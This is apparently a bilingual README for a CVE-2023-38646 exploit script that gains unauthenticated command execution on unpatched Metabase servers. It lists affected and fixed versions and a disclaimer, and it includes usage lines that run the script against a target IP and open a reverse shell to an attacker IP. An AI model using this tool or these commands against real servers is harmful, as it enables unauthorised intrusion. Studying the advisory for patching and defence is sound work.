
Metabase open source before 0.46.6.1 and Metabase Enterprise before 1.46.6.1 allow attackers to execute arbitrary commands on the server, at the server's privilege level. Authentication is not required for exploitation. The other fixed versions are 0.45.4.1, 1.45.4.1, 0.44.7.1, 1.44.7.1, 0.43.7.2, and 1.43.7.2.
Metabase с открытым исходным кодом до версии 0.46.6.1 и Metabase Enterprise до версии 1.46.6.1 позволяют злоумышленникам выполнять произвольные команды на сервере с привилегиями сервера. Для эксплуатации аутентификация не требуется. Другие исправленные версии: 0.45.4.1, 1.45.4.1, 0.44.7.1, 1.44.7.1, 0.43.7.2 и 1.43.7.2.
Уязвимость заключается в том, что приложение предоставляет setup-token, который можно использовать для проверки базы данных в api/setup/validate. Неавторизованный пользователь может создать вредоносный код и выполнить произвольную команду.
ИСПОЛЬЗУЙТЕ НА СВОЙ СТРАХ И РИСК
Этот скрипт предоставлен для образовательных и тестовых целей. Автор не несет ответственности за любое неправомерное использование или ущерб, вызванный его использованием. Обеспечьте соблюдение применимых законов и этических норм. Используя этот скрипт, вы признаете и принимаете эти условия.
Metabase — это инструмент бизнес-аналитики с открытым исходным кодом, который позволяет создавать диаграммы и дашборды на основе данных из различных баз данных и источников данных. Это популярный проект с более чем 33 000 звезд на GitHub, который в последние годы подвергался значительному анализу с точки зрения исследования уязвимостей.
usage: CVE-2023-38646.py [-h] -rh REMOTE_HOST [-rp [REMOTE_PORT]] -p PORT -l LOCAL_HOST
options:
-h, --help show this help message and exit
-rh REMOTE_HOST, --remote-host REMOTE_HOST
Hostname of the target.
-rp [REMOTE_PORT], --remote-port [REMOTE_PORT]
Port of the Target Machine (default: Port 80)
-p PORT, --port PORT Port for reverse shell.
-l LOCAL_HOST, --local-host LOCAL_HOST
Your IP Adress
Вы можете запустить скрипт с помощью этой команды ниже. Вы можете изменить удаленный порт с помощью -rp. Порт по умолчанию — 80.
./CVE-2023-38646.py -rh <Target-IP> -p <revese-shell port> -l <Attacker IP>
python3 CVE-2023-38646.py -rh <Target-IP> -p <revese-shell port> -l <Attacker IP>

Metabase Enterprise 1.46 < 1.46.6.1
Metabase Enterprise 1.45 < 1.45.4.1
Metabase Enterprise 1.44 < 1.44.7.1
Metabase Enterprise 1.43 < 1.43.7.2
Metabase open source 0.46 < 0.46.6.1
Metabase open source 0.45 < v0.45.4.1
Metabase open source 0.44 < 0.44.7.1
Metabase open source 0.43 < 0.43.7.2